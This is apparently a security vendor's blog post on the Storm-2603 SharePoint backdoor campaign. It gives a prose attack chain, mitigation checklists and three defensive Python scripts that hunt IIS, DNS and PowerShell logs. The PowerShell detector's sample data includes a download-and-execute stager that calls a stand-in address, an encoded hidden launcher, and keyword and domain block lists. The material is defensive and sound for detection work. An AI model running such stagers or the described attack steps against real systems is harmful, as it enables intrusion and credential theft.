On July 18, 2025, a threat group known as Storm-2603 began exploiting a set of vulnerabilities in on-premises Microsoft SharePoint servers. These flaws were found in the ToolPane.aspx page and were labeled CVE-2025-49704, CVE-2025-49706, and later CVE-2025-53770 and CVE-2025-53771. The attackers used these vulnerabilities to bypass authentication and deploy a web shell named spinstall0.aspx. This allowed them to access sensitive machine keys, maintain persistent sessions, and control systems without detection. This marked the start of the widespread Storm-2603 Backdoor Attack.
After deploying the backdoor, the attackers used PowerShell commands, DLL sideloading, and driver exploits to disable security tools, steal credentials, and install ransomware. They primarily delivered Warlock and LockBit Black ransomware strains. More than 400 organizations were affected, including critical US government entities like the National Nuclear Security Administration. The Storm-2603 Backdoor Attack quickly gained attention for its stealth and scale.
This attack chain was rapid, stealthy, and highly coordinated. Organizations that were running unpatched or partially patched versions of SharePoint were the primary targets. Even after applying official Microsoft patches, the attackers could bypass security controls using the extracted machine keys and maintain unauthorized access. It became evident that the Storm-2603 Backdoor Attack exploited deep architectural gaps in enterprise defenses.
Step-by-Step Breakdown of the Storm-2603 Backdoor Attack
- Initial Exploitation: The attackers sent a specially crafted POST request to the ToolPane.aspx page of the SharePoint server. This request included a fake Referer header, tricking the application into allowing unauthorized access.
- Web Shell Installation: Once inside, they deployed a web shell called spinstall0.aspx. This gave them a command-and-control point directly inside the server, anchoring the Storm-2603 Backdoor Attack.
- Machine Key Extraction: The attackers used a custom DLL named IISServerdll.dll to extract cryptographic machine keys from the server. These keys allowed them to generate forged session cookies and maintain access even if the credentials were changed or the server was rebooted.
- Privilege Escalation and Reconnaissance: With the web shell in place, they launched encoded PowerShell scripts to scan the network. They used tools like SharpHostInfo and masscan to identify high-value targets within the environment.
- Disabling Security: The attackers deployed a malicious driver called ServiceMouse.sys. This driver was used to disable antivirus protections using a bring-your-own-vulnerable-driver method. Once the defenses were down, they continued their lateral movement undetected.
- Credential Harvesting: Using Mimikatz, they dumped credentials from the LSASS process. These credentials helped them log in to other machines in the network using tools like PsExec and Impacket.
- Ransomware Deployment: Finally, they deployed Warlock or LockBit Black ransomware. These were delivered using DLL hijacking through applications like 7z.exe or via malicious MSI installers. Once executed, files were encrypted, and ransom notes were dropped across the infected systems. This completed the Storm-2603 Backdoor Attack chain.
This multi-step attack shows how even a single vulnerability, if unpatched, can be used to carry out a full-scale network compromise.
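The first two steps above leave a footprint in the IIS web logs: a POST to ToolPane.aspx from an unauthenticated client, followed by requests for spinstall0.aspx. The script below is an added example written for this article; it is not Storm-2603 tooling, Microsoft code, or a vendor product. It parses the IIS W3C log format (the `#Fields:` header defines the columns) and flags those two patterns. The log lines are constructed for the demo, and the `/_layouts/15/` path, the client addresses and the user agents are assumptions.

```python
"""Hunt IIS W3C logs for the ToolPane.aspx / spinstall0.aspx pattern.

Added example, not from the write-up, Microsoft, or any vendor. The log
lines are constructed; the field list mirrors the default IIS W3C layout."""
import posixpath
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass
class Hit:
    line_no: int
    severity: str
    reason: str
    client_ip: str
    user: str
    method: str
    uri: str
    referer: str


def parse_w3c(text: str) -> Iterator[Tuple[int, Dict[str, str]]]:
    """Yield (line_no, row dict) for each data line, honouring #Fields headers.

    IIS writes one token per field and substitutes '+' for spaces, so a plain
    whitespace split is safe."""
    fields = None
    for n, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError(f"line {n}: data before any #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or malformed line: skip it rather than crash
        yield n, dict(zip(fields, parts))


def scan_iis_log(text: str) -> List[Hit]:
    hits: List[Hit] = []
    for n, row in parse_w3c(text):
        method = row.get("cs-method", "").upper()
        uri = row.get("cs-uri-stem", "")
        page = posixpath.basename(uri).lower()
        user = row.get("cs-username", "-")
        common = dict(client_ip=row.get("c-ip", "-"), user=user, method=method,
                      uri=uri, referer=row.get("cs(Referer)", "-"))
        if page == "spinstall0.aspx":
            hits.append(Hit(n, "high", "request for spinstall0.aspx web shell", **common))
        elif page == "toolpane.aspx" and method == "POST":
            if user == "-":  # anonymous POST: matches the authentication bypass
                hits.append(Hit(n, "high", "unauthenticated POST to ToolPane.aspx", **common))
            else:            # page editors also POST here; triage, do not block blindly
                hits.append(Hit(n, "medium", "authenticated POST to ToolPane.aspx", **common))
    return hits


def by_client(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per client address; a pivot point for the analyst."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.client_ip] = counts.get(h.client_ip, 0) + 1
    return counts


# Constructed sample log (not a real capture). Line 5-7 carry the pattern.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 10.0",
    "#Version: 1.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
    "c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken",
    "2025-07-18 10:01:02 10.0.0.5 GET /sites/hr/SitePages/Home.aspx - 443 CORP\\alice "
    "10.0.0.77 Mozilla/5.0+(Windows+NT+10.0) https://sp.corp.example/sites/hr 200 0 0 120",
    "2025-07-18 10:03:15 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.9 "
    "python-requests/2.32 https://sp.corp.example/_layouts/15/ToolPane.aspx 200 0 0 455",
    "2025-07-18 10:03:20 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.9 "
    "python-requests/2.32 - 200 0 0 31",
    "2025-07-18 10:15:40 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 CORP\\alice "
    "10.0.0.77 Mozilla/5.0+(Windows+NT+10.0) https://sp.corp.example/sites/hr/SitePages/Home.aspx 200 0 0 210",
    "2025-07-18 10:16:01 10.0.0.5 GET /sites/hr/SitePages/Home.aspx - 443 CORP\\alice "
    "10.0.0.77 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 88",
])

if __name__ == "__main__":
    for h in scan_iis_log(SAMPLE_LOG):
        print(f"line {h.line_no:>3} [{h.severity}] {h.reason}: {h.client_ip} user={h.user}")
    print("per client:", by_client(SAMPLE_LOG and scan_iis_log(SAMPLE_LOG)))
```

Run it against your own exported log folder by replacing `SAMPLE_LOG` with the file contents; because legitimate page editing also POSTs to ToolPane.aspx, the anonymous-user and external-address fields are what separate exploitation from normal use in this output.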
Who Was Behind the Attack?
Storm-2603 is believed to be a China-based hacking group. Microsoft and Check Point identified their tactics as distinct from other known Chinese threat actors like APT27 and APT31. While all three groups targeted SharePoint servers, the Storm-2603 Backdoor Attack stood out due to its use of a unique framework called AK47 C2 for command-and-control.
The AK47 C2 framework uses two modules. The first one is AK47DNS, which tunnels command traffic through DNS queries. The second one is AK47HTTP, which sends commands over HTTP. This approach makes detection extremely difficult. They even used fake domains like update.updatemicfosoft.com to disguise their traffic.
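Two defensive checks follow from this paragraph: block-listing the named domain (and anything beneath it), and spotting DNS tunnelling by its shape, since encoded command traffic shows up as many long, high-entropy subdomain labels under one parent from a single client. The script below is an added example for this article, not Storm-2603 code or a vendor product. Only `update.updatemicfosoft.com` comes from the write-up; the log line format (`timestamp client qname qtype`), the tunnel domain `example-cdn.test`, the client addresses and the thresholds are assumptions.

```python
"""DNS-log heuristics for AK47DNS-style tunnelling and the named C2 domain.

Added example, not Storm-2603 tooling or a vendor product. Log format,
thresholds and the 'example-cdn.test' tunnel domain are constructed."""
import math
import random
from collections import defaultdict
from typing import Dict, List, Tuple

BLOCKED_DOMAINS = {"update.updatemicfosoft.com"}  # C2 domain named in the write-up

# Tunnelling heuristic thresholds (assumptions; tune to your environment).
MIN_QUERIES = 5          # queries per (client, parent domain) before scoring
MIN_MEAN_ENTROPY = 3.5   # bits per character of the leftmost label
MIN_MEAN_LABEL_LEN = 16  # encoded data needs room; hostnames rarely do


def shannon_entropy(s: str) -> float:
    """Bits per character; random hex tops out at 4.0, real hostnames sit near 2-3."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _labels(qname: str) -> List[str]:
    return qname.lower().rstrip(".").split(".")


def is_blocked(qname: str) -> bool:
    """True if qname equals a blocked domain or sits anywhere beneath one."""
    labels = _labels(qname)
    return any(".".join(labels[i:]) in BLOCKED_DOMAINS for i in range(len(labels)))


def parent_domain(qname: str) -> str:
    """Crude registrable-domain approximation: the last two labels."""
    return ".".join(_labels(qname)[-2:])


def analyze_dns_log(text: str) -> Dict[str, list]:
    """Return blocked-domain hits and (client, parent) pairs that look like tunnels."""
    blocked: List[Tuple[str, str]] = []
    groups: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # malformed line
        _ts, client, qname, _qtype = parts
        if is_blocked(qname):
            blocked.append((client, qname))
        labels = _labels(qname)
        if len(labels) >= 3:  # there is a subdomain label worth scoring
            groups[(client, parent_domain(qname))].append(labels[0])
    suspects: List[Tuple[str, str]] = []
    for key, subs in sorted(groups.items()):
        if len(subs) < MIN_QUERIES:
            continue
        mean_ent = sum(map(shannon_entropy, subs)) / len(subs)
        mean_len = sum(map(len, subs)) / len(subs)
        if mean_ent >= MIN_MEAN_ENTROPY and mean_len >= MIN_MEAN_LABEL_LEN:
            suspects.append(key)
    return {"blocked": blocked, "tunnel_suspects": suspects}


# Constructed sample: 32-char pseudo-random hex labels stand in for encoded data.
_rng = random.Random(7)


def _fake_encoded_label() -> str:
    chars = list("0123456789abcdef" * 2)
    _rng.shuffle(chars)
    return "".join(chars)  # every hex digit twice: entropy exactly 4.0 bits/char


SAMPLE_DNS_LOG = "\n".join(
    ["2025-07-18T10:05:00 10.0.0.78 www.microsoft.com A",
     "2025-07-18T10:05:02 10.0.0.78 sp.corp.example A",
     "2025-07-18T10:05:03 10.0.0.77 update.updatemicfosoft.com A",
     "2025-07-18T10:05:04 10.0.0.77 beacon.update.updatemicfosoft.com A"]
    + [f"2025-07-18T10:05:{5 + i:02d} 10.0.0.77 {_fake_encoded_label()}.t.example-cdn.test TXT"
       for i in range(8)]
    + ["2025-07-18T10:05:20 10.0.0.78 cdn.example-cdn.test A"]
)

if __name__ == "__main__":
    result = analyze_dns_log(SAMPLE_DNS_LOG)
    for client, name in result["blocked"]:
        print(f"BLOCKED  {client} -> {name}")
    for client, parent in result["tunnel_suspects"]:
        print(f"TUNNEL?  {client} -> *.{parent}")
```

The block list catches the known domain; the entropy and length heuristic is what catches the next domain the group registers, at the cost of occasional false positives from CDNs and telemetry services, so feed suspects into triage rather than an automatic block.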
The group has been active since at least March 2025. They primarily target organizations in Asia-Pacific and Latin America. Their operations show a mix of cyber espionage and financial crime, blending advanced persistent threat tactics with ransomware deployment.
Their toolkit includes open-source tools and custom-developed payloads. They often use DLL sideloading, vulnerable driver exploits, and stealthy persistence techniques. Their focus on stealing machine keys and using them for long-term access shows their deep understanding of SharePoint internals. The Storm-2603 Backdoor Attack was one of the most advanced and persistent threats in 2025.
Consequences and Financial Impact
The impact of the Storm-2603 Backdoor Attack was massive. At least 400 organizations were affected worldwide. These included government agencies, educational institutions, critical infrastructure providers, and private companies. Financial losses from the attack were significant. Many organizations faced ransom demands, lost access to their data, and had to pay for extensive recovery efforts.
For individuals, the consequences were also serious. Many employees had their login credentials stolen. Sensitive internal documents were encrypted or leaked. In some cases, systems were offline for days or weeks, causing operational paralysis.
This incident also raised alarms in political and media circles. News agencies highlighted the failure of early patching and the delayed response from some vendors. Security analysts criticized the lack of deep monitoring and the over-reliance on perimeter defenses.
From a global perspective, the Storm-2603 Backdoor Attack added tension between China and Western countries. While China denied any involvement, security experts pointed to a pattern of behavior that matched past state-sponsored campaigns.
How to Protect Yourself from the Storm-2603 Backdoor Attack

Here’s how you can stay safe:
- Apply Microsoft’s July 2025 security updates for SharePoint without delay.
- Enable Antimalware Scan Interface (AMSI) in full mode and run a reliable antivirus solution.
- Rotate ASP.NET machine keys and restart the IIS server.
- Monitor HTTP logs for access to ToolPane.aspx and other unusual traffic.
- Watch for PowerShell script execution (Event ID 4104) and AMSI logs.
- Block DNS traffic to suspicious domains like update.updatemicfosoft.com.
- Use endpoint detection tools that can spot Mimikatz, PsExec, and DLL hijacking.
- Train your IT teams to recognize signs of credential theft and lateral movement.
- Develop an incident response plan with defined steps for containment and recovery.
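The PowerShell item in the list above (Event ID 4104, script block logging) is only useful if someone scores what lands in it. The script below is an added example for this article, not Microsoft code or a vendor detection: it triages constructed 4104-style records, decodes any embedded base64 the way `-EncodedCommand` expects (UTF-16LE), and re-scans the decoded text so a one-layer wrapper does not hide the intent. The event dictionaries, the staging URL, the indicator list and its weights are assumptions to be tuned.

```python
"""Triage PowerShell script-block records (Event ID 4104) for encoded or
obfuscated commands.

Added example, not Microsoft or vendor code. Events are constructed dicts
standing in for the ScriptBlockText of a 4104 record; indicators and
weights are assumptions."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

INDICATORS: Dict[str, int] = {  # lower-case substring -> weight
    "frombase64string": 3,
    "-encodedcommand": 4, "-enc ": 4,        # nested encoded invocation
    "invoke-expression": 2, "iex ": 2, "iex(": 2,
    "downloadstring": 3, "downloadfile": 3, "invoke-webrequest": 1,
    "-windowstyle hidden": 2, "-w hidden": 2,
    "-noprofile": 1, "-nop ": 1,
    "bypass": 2,                              # -ExecutionPolicy Bypass
}
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
ALERT_THRESHOLD = 5


@dataclass
class Finding:
    record_id: int
    score: int
    matched: List[str]
    decoded: List[str]


def decode_embedded_base64(text: str) -> List[str]:
    """Decode long base64 runs as UTF-16LE (what -EncodedCommand uses), then
    UTF-8; skip blobs that are not valid base64 or do not decode to text."""
    out: List[str] = []
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if s and all(c.isprintable() or c.isspace() for c in s):
                out.append(s)
                break
    return out


def score_script_block(text: str) -> Tuple[int, List[str], List[str]]:
    """Weighted indicator match over the text and over anything it decodes to."""
    lowered = text.lower()
    matched = [k for k in INDICATORS if k in lowered]
    score = sum(INDICATORS[k] for k in matched)
    decoded = decode_embedded_base64(text)
    for payload in decoded:  # re-scan: the wrapper is usually bland, the payload is not
        inner = payload.lower()
        extra = [k for k in INDICATORS if k in inner and k not in matched]
        matched += extra
        score += sum(INDICATORS[k] for k in extra)
    return score, matched, decoded


def triage_events(events: List[Dict]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        score, matched, decoded = score_script_block(ev.get("ScriptBlockText", ""))
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(ev["RecordId"], score, matched, decoded))
    return findings


def _ps_encode(script: str) -> str:
    """Encode the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry); 203.0.113.9 is a documentation address.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/stage2.ps1')"
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\inetpub\\logs | Where-Object { $_.Length -gt 1MB }"},
    {"RecordId": 2, "EventID": 4104,
     "ScriptBlockText": "$b=[Convert]::FromBase64String('" + _ps_encode(_STAGE2) + "');"
                        "[Text.Encoding]::Unicode.GetString($b) | Invoke-Expression"},
    {"RecordId": 3, "EventID": 4104,
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc " + _ps_encode("Get-Process lsass")},
    {"RecordId": 4, "EventID": 4103, "ScriptBlockText": "not a script-block record; ignored"},
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"record {f.record_id}: score={f.score} matched={f.matched}")
        for d in f.decoded:
            print("   decoded:", d)
```

Hook this to your SIEM's export of the Microsoft-Windows-PowerShell/Operational channel and alert on the score; the decoded payload is what an analyst needs to see first, since the raw 4104 text for an encoded launcher is otherwise an opaque blob.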
Quick Checklist
- Patch SharePoint Immediately
- Always apply the latest SharePoint patches as soon as they are released. This reduces the risk of known vulnerabilities being exploited. Microsoft’s July 2025 update specifically addresses the flaws used in the Storm-2603 Backdoor Attack.
- Enable Full-Mode AMSI
- AMSI (Antimalware Scan Interface) should be enabled in full scan mode. It allows antivirus tools to analyze and block malicious scripts, especially obfuscated PowerShell commands used by attackers in the Storm-2603 Backdoor Attack.
- Rotate Machine Keys
- Machine keys used for cryptographic operations in ASP.NET must be rotated regularly. This prevents attackers from reusing stolen keys to forge authentication tokens or cookies.
- Monitor Logs (IIS, AMSI, PowerShell)
- Enable and review logs for suspicious behavior. Track access to sensitive URLs like ToolPane.aspx, monitor PowerShell execution logs (Event ID 4104), and analyze AMSI telemetry for unusual script activity.
- Block Malicious DNS Domains
- Set firewall and DNS filters to block access to known command-and-control domains used in the Storm-2603 Backdoor Attack.
- Deploy Endpoint Detection Tools
- Use advanced endpoint protection platforms that can detect credential theft tools (like Mimikatz), lateral movement methods (like PsExec), and DLL sideloading attempts.
- Educate IT Teams
- Regular training helps IT staff recognize signs of compromise and respond quickly. They should know how to detect and mitigate web shells, script-based attacks, and malicious driver installations.
- Prepare a Solid Incident Response Plan
- Have a clear, documented response strategy that includes detection, containment, eradication, and recovery steps. Conduct tabletop exercises to ensure your team is ready when an incident occurs.
Additional Subtopics for Better Protection
- Isolate High-Value Systems
- Critical systems should be segmented from the rest of the network. If one system is compromised, this containment reduces the risk of the attacker reaching other sensitive areas.
- Apply the Principle of Least Privilege
- Only give users and applications the minimum level of access required. This limits the potential damage if an account is compromised during the Storm-2603 Backdoor Attack.
- Audit and Harden Configuration Settings
- Regularly review server and application configurations. Disable unused features, close unnecessary ports, and ensure that security settings follow best practices.
- Implement Multi-Factor Authentication (MFA)
- MFA can block many attacks that rely on stolen credentials. Ensure that administrative accounts, especially those with access to SharePoint or domain controllers, are protected by MFA.
- Backup Regularly and Test Recovery
- Maintain frequent and secure backups of all critical systems and data. Test your recovery process to make sure it works before you actually need it.
- Watch for Suspicious Lateral Movement
- Use behavioral analytics tools to detect unusual login patterns, unexpected admin access, or large data transfers across internal systems.
- Set Up Threat Intelligence Feeds
- Use real-time threat intelligence to stay updated on indicators of compromise (IOCs), malicious IPs, and attack trends. Integrate this intelligence into your SIEM system to defend against the Storm-2603 Backdoor Attack and similar threats.
Lessons Learned from the Storm-2603 Backdoor Attack
Here’s what we can take from the Storm-2603 Backdoor Attack:
- Always assume that a single vulnerability can lead to total compromise.
- Relying on initial patches alone is not enough.
- Attackers can remain in a system even after patches are applied.
- Defense should be layered, including network monitoring, endpoint protection, and regular audits.
- Deep visibility into logs is essential for early detection.
Hoplon Infosec recommends building a strong cyber hygiene culture. This includes training, monitoring, incident readiness, and investing in endpoint protection. Organizations should not wait for an incident to start preparing. They should build security into their workflows from the beginning.
Final Summary
- Patch all systems, especially critical platforms like SharePoint
- Monitor all internal traffic and scripts
- Educate staff about common attacker tools
- Use detection tools that go beyond antivirus
- Have a response plan ready to counter incidents like the Storm-2603 Backdoor Attack
How Hoplon Infosec Can Help
Hoplon Infosec offers a wide range of solutions to protect against advanced cyber threats like the Storm-2603 Backdoor Attack. Their services include threat detection, penetration testing, app security assessments, phishing protection, and data encryption strategies. Whether you are an enterprise or a small team, Hoplon helps you build a proactive and resilient security posture.
Prepare before it’s too late. Hoplon Infosec stands by to defend your digital environment with strength and speed.
Explore our core cybersecurity services:
- Mobile Security
- Endpoint Security
- Deep and Dark Web Monitoring
- ISO Certification and AI Management System
- Web Application Security Testing
- Penetration Testing
For more services, visit our homepage.
Follow us on X (Twitter), LinkedIn, YouTube, Facebook, and Instagram for the latest cybersecurity updates. At Hoplon Infosec, we’re committed to securing your digital world.